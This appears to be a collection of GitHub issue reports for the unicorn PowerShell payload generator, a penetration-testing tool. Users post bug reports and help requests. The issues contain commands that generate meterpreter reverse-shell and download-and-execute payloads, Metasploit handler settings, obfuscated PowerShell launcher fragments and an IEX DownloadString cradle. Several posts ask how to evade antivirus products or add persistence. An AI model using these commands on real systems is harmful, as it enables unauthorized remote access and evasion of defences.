
unicorn's Issues

file is not downloaded or executed.

python unicorn.py windows/download_exec exe=test.exe url=http://someurl.com/myexe.exe macro

Generated macro not working in Office (does not download and execute my exe).

Unicorn payload generation for x64

@trustedsec Hi, does unicorn provide a feature to create the payload for x64? As I'm aware, the payload is created for x86, but I would need to create it on x64. Is it possible to create the payload for a macro attack in x64? If so, please do guide me, thanks.

Macro detected by windows defender.

Looks like the format of the macro is being picked up by Windows Defender.
It may be a good idea to poach the output format of Empire's macro payload, since that still doesn't get detected :D

Last Update (version 2.3.4) Does Not Work!

Hi Dear,

Since version 2.3.4 was released, powershell_attack.txt does not work!
I tried this command:
python unicorn.py windows/meterpreter/reverse_https ip port
and converted the .txt file to a .bat file and ran that, but powershell.exe doesn't open on the target system (my local VM system) and the listener doesn't receive any sessions!
On the other hand, this time the previous version is caught by Windows Defender, Kaspersky and Norton AVs :(

Detected by 3 major AVs

Hey,

The new version is detected at runtime by Kaspersky, Symantec and McAfee. Any chance you are planning another round of obfuscation ninjutsu soon? :)

Thanks

Windows 7 now can't run Word

Hello, unicorn is working perfectly, but now I can't run any Word files; it always gives me an error. How can I reverse that?

DNS Resolve fails.

Hello,

I admire your work and the good work you've done here! I have been using unicorn for a long time, and I realised that I have a problem. I don't know what's wrong with it, but I think I can report it here and you might be able to fix it. The issue is simple; I am generating a payload like this:

python unicorn.py windows/meterpreter/reverse_tcp HOST PORT hta .

I have my file generated and it works like a charm, but I am using a DNS as a host so it can resolve to my dynamic IP address. The problem is that if my IP address changes, the DNS normally resolves the new one without any problems, but the HTA file doesn't resolve the new IP address from the DNS, which it currently should because the DNS has been updated, but the script doesn't!!

Please fix it :)

.hta's Broken in latest unicorn?

I'm no longer able to generate working .hta's using unicorn. I was wondering if you could confirm this is a legitimate issue, or is this just me?

I've generated working payloads on my setup before pulling the latest from GitHub. The problem appears to be that the .hta generated has some sort of syntax error, maybe from unbalanced quotes?

Steps to Recreate

  1. Clone the latest unicorn, or git pull to the latest:

git clone https://github.com/trustedsec/unicorn.git

or, if you have it, update to the latest:

git pull

  2. Generate an .hta file (note: no errors show while generating, it is not a problem with generating the payload, the problem appears to be with the syntax script or powershell generated):

python unicorn.py windows/meterpreter/reverse_tcp 123.123.123.123 443 hta

  3. Launch the .hta file on a Windows host, and observe the error.

Temporary Workaround

Reverting to version 2.4.2 appears to fix the issue:

git clone https://github.com/trustedsec/unicorn.git
git checkout tags/2.4.2
python unicorn.py windows/meterpreter/reverse_tcp 123.123.123.123 443 hta

Additional Details

I believe the issue is the quoting right before the larger base64 part of the payload (right before “STUFF” in this comparison for example). Reverting to 2.4.2, right before commit 8fc0a81, appears to resolve the error message and allow proper payload execution.

2.4.2:

a.run('%windir%\\System32\\cmd.exe /c powershell -w 1 -C "sv 77 -;sv II ec;sv Z ((gv 77).value.toString()+(gv II).value.toString());powershell (gv Z).value.toString() "STUFF

2.4.3

a.run('%windir%\\System32\\cmd.exe /c powershell -w 1 -C "sv CY -;sv 5S ec;sv n ((gv CY).value.toString()+(gv 5S).value.toString());powershell (gv n).value.toString() 'STUFF

So it could be related to this commit: 8fc0a81

Suggestion: Allow disabling of sync on a per-configuration basis

Hi Kam,

Big fan of Unicorn, so I figured I would add a suggestion that I think would make it even better!

We all know that keeping development environments up to date with content from production environments is a real hassle, often involving database backups etc. Unicorn of course lets us get around this!

However, a human error might occur where someone accidentally syncs content on a production environment, so it would be awesome if it was possible to disable sync for a given configuration.

HTA Attack Error

Team,

I am trying the HTA attack on my lab (Win 10/2012), but when I access https://192.168.1.5 on the victim end, I got the error below.

Server End:
python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta

msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > set EnableStageEncoding true
EnableStageEncoding => true
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://0.0.0.0:443/
[*] Starting the payload handler...
msf exploit(handler) > [*] 192.168.1.100:41859 Request received for /...
[*] 192.168.1.100:41859 Unknown request to / #<Rex::Proto::Http::Request:0x0000000414c0b8 @headers={"Accept"=> "text/html, application/xhtml+xml, image/jxr, /", "Host"=>"192.168.1.5", "Connection"=>"Keep-Alive", "Acce pt-Language"=>"en-IN", "User-Agent"=>"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, lik e Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586", "Accept-Encoding"=>"gzip, deflate"}, @auto_cl=true, @State=3, @transfer_chunked=false, @inside_chunk=false, @bufq="", @Body="", @method="GET", @raw_uri="/", @uri_ parts={"QueryString"=>{}, "Resource"=>"/"}, @proto="1.1", @chunk_min_size=1, @chunk_max_size=10, @uri_encode_m ode="hex-normal", @relative_resource="/", @body_bytes_left=0>...
[*] 192.168.1.100:41877 Request received for /...
[*] 192.168.1.100:41877 Unknown request to / #<Rex::Proto::Http::Request:0x0000000406e0b0 @headers={"Host"=>" 192.168.1.5", "Accept"=>"text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8", "Accept-Language"= >"en-us", "Connection"=>"keep-alive", "Accept-Encoding"=>"gzip, deflate", "User-Agent"=>"Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/6 02.1"}, @auto_cl=true, @State=3, @transfer_chunked=false, @inside_chunk=false, @bufq="", @Body="", @method="GE T", @raw_uri="/", @uri_parts={"QueryString"=>{}, "Resource"=>"/"}, @proto="1.1", @chunk_min_size=1, @chunk_max _size=10, @uri_encode_mode="hex-normal", @relative_resource="/", @body_bytes_left=0>...

Macro does not connect

The macro attack in version 2.7.2 doesn't connect, but in version 2.6 it connects without problems.

PowerShell will expire after 24h

Hi amigos,
I have an issue: when I want to use the powershell.txt code after 24h, PowerShell will run but nothing happens in Metasploit, whereas during the first 24h after generating the code everything is okay.
I think it is related to the expiry date of that payload, which has been set to limited hours.
Please fix this serious issue.
Peace

macro problem in https

Hi
When I try to generate an https macro it doesn't work for me. When I put the code in an xls or doc it doesn't connect; in the best case I once got "Unknown request to / with UA ... "

error

I got this error with the new version.
xxx@xxxx:/unicorn# python unicorn.py
File "unicorn.py", line 438
if not os.popen("msfvenom -h").read():
^
IndentationError: unexpected indent

DDE meterpreter/reverse_https payload consistently exceeds command line limit

First, thank you Dave for this awesome tool!

I've been trying to generate a DDE meterpreter/reverse_https payload but I cannot due to the payload exceeding the command line limit.

I have tried with various IPs to include the example that unicorn provides: python unicorn.py windows/meterpreter/reverse_https 192.168.5.5 443 dde

Unicorn provides this warning: [!] WARNING. WARNING. Length of the payload is above command line limit length of 8191. Recommend trying to generate again or the line will be cut off.
Press {return} to continue.

I am using the latest version of unicorn via this repo. Thanks again!

powershell_attack.txt is not working just after a day

Dear trustedsec,

There was a misunderstanding about my prior post. Now, let me explain clearly.
I'm going to generate a powershell_attack.txt through unicorn.py tool and then use it to attack a target via metasploit. However, that powershell_attack.txt is stable for just some hours and after a period of time it will be expired or not working anymore.
I would be very grateful if you give me some information about this matter.
Is there any way to stabilize that powershell_attack.txt code for more time and use it for another time?

Regards,

Error

Hi guys, I have Kali Rolling 2.0 and it shows this error:

File "unicorn.py", line 438
if not os.popen("msfvenom -h").read():
^
IndentationError: unexpected indent

Why?

Embedded persistence

Hi, I was wondering if you have thought of a way to initially include persistence during the generation of the payload.
Cheers

persistence generation

Hello, I would like to know if the .bat file is in persistence mode when we are generating it.
Otherwise, if the victim opens it without a connection, is it possible to capture a session when the connection is turned on?

unicorn detection

Nice project keep up the good work man.

I tested this Macro Attack against Kaspersky and NOD32, but it was detected in memory and closed because it uses powershell to execute another powershell. Do you think there is a way this can be bypassed?

Thanks

We have a problem here

Well, bypass properly the AV using my own obfuscation and using the system memory.

The problem now is that, when I'm in the meterpreter and I try to migrate or open the shell, this action is suspicious and is blocked by the "victim" AV.

So, I can start the session shell, but once I'm on the session, each action or movement from meterpreter is caught by mr kspky

Any hint? thanks

Too many line continuations

Thanks for this awesome powershell tool, trustedsec. I am just having an issue with Office 2013, where I've customised the payload to reverse_https with the macro attack.

When I copy/paste the code, an error box appears stating "Too many line continuations"
Is there a way around that?

Thank you

Norton AV Trouble

Hi there,

I understand that TrustedSec is not responsible for the meterpreter stager, however I thought that this particular case was interesting due to the fact that SetStageEncoding was set to true.

Environment details listed below:

Norton Security (Full Trial)
Version: 22.5.2.15

unicorn

Any feasible way to get around this while still being able to use Meterpreter? Are there any encoding options that I am leaving out?

The payload is being executed with the following Scheduled Task:

Powershell.exe -NoExit -Windowstyle hidden IEX ((New-Object Net.WebClient).DownloadString('http://pentestbox/powershell_attack.txt'))

Note: I'm not using powershell_attack.txt as the filename.

No connection

Every time I execute a payload on a Windows machine (running 8), none of the attacks give me back a connection. I run the Social Engineering Toolkit version of the powershell attack and it works fine, so it is not my computer.

Length of the payload is above command line limit length of 8191

Hello, I am getting a warning and my .exe is only 32 KB.
I am using: windows/download_exec exe=test.exe url=http://badurl.com/payload.exe

[!] WARNING. WARNING. Length of the payload is above command line limit length of 8191. Recommend trying to generate again or the line will be cut off.
Press {return} to continue.

What is the cause?

download_exec for HTA

Can you try to implement download_exec for HTA files? The reverse kind of sucks sometimes, and it would be really good if we could use the download_exec command.


MissingExpressionAfterOperator Parser Error with Powershell_attack.txt execution

Hi
I am using Kali Linux (IP: 192.168.56.103) as the C&C and a test Windows 7 x64 VM (192.168.56.201) as the client.

I run the following to generate the powershell_attack.txt and unicorn.rc command.

python unicorn.py windows/meterpreter/reverse_tcp 192.168.56.103 443

When I copy and paste the command in the client from powershell, the window disappears and I do not get a reverse meterpreter shell on the C&C. Then, I slightly modify the powershell_attack.txt from "-w 1" to "-w 0" to ensure that the window does not disappear and I can see the error. I get the following error:


Missing expression after unary operator '-'.
At line:1 char:2
+ - <<<< e''c JABlAGgAIAA9ACAAJwBbAEQAbABsAEkAbQBwAG.......... <omitted tldr;>.........
    + CategoryInfo          : ParserError: (-:String) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : MissingExpressionAfterOperator

The original powershell_attack.txt file context is as shown below.

Thanks
Max

powershell -w 1 -C "s''v Wtl -;s''v Om e''c;s''v CT ((g''v Wtl).value.toString()+(g''v Om).value.toString());powershell (g''v CT).value.toString() ('<payload omitted>')"

Word 2016 : Powershell Macro not launched automatically

Hello,

Big fan, just ran into an issue with a relatively small powershell macro. When opening Word 2016, I'd expect, after "Enabling Content", that the Macro should launch automatically... but it does not. I can only launch it by navigating to "View -> Macro -> Run -> Auto_Open", and then the payload is executed successfully.

Macro was created with the "macro 500" switch and seems to be fully functional as seen when executed manually.

Thoughts? What can I do to debug this?

Word 2016

I have been trying to use this today with Word 2016 (and Excel) without any success. I can use it with just powershell via commandline, session loads fine. But with Word (freshly installed earlier in the week in a fresh install of Win10) I get nothing. Looking at traffic, nothing comes out of machine after I open the Word file at all. I can't see any error or feedback that is any different to expectations from videos online. It does the popup saying older version of word. Just doesn't seem to send the payload to powershell.

not able to generate payload

Hello, I am getting the error below and have tried with different Python versions, but no use ... please help

[!] Shellcode was not generated for some reason. Check payload name and if Metasploit is working and try again.

Supported Windows / Office Versions

Sorry for opening an issue for this but I don't know where else to ask.

I have tested unicorn successfully under Windows 7 & Office 2016. Any idea what other Windows / Office versions are supported?

Wrong content of resource file

When I do

python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 macro

just as an example, the output of the .rc file is as follows:

use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST windows/meterpreter/reverse_tcp
set LPORT 192.168.1.5
set ExitOnSession false
set EnableStageEncoding true
exploit -j

So, the payload value takes the place of the lhost value, and lhost is taking over the lport value. And I wonder if the generated txt file also contains appropriate code, because my msfconsole did not catch any session.

python version for generate payload

Hi

I'm using all versions of Python to generate shellcode, but I receive an error:

python2.7 unicorn.py payload/windows/meterpreter/reverse_tcp 45.45.45.45 445
[*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode...
[!] Length of shellcode was not generated. Check payload name and if Metasploit is working and try again.
Exiting....

python >= 3 :

python3.5 unicorn.py payload/windows/meterpreter/reverse_tcp 45.45.45.45 445
[*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode...
[!] Something went wrong, printing the error: name 'reduce' is not defined

Of course I installed all the Python package dependencies.
How do I solve it?

Thanks

Doesn't return session in Kali.

Hi,
I generated a payload with unicorn in Kali 2016. When I run pwershell.bat it doesn't give me any access; it doesn't return a session in Kali.
I think your code doesn't work.
Please help me.
Thanks
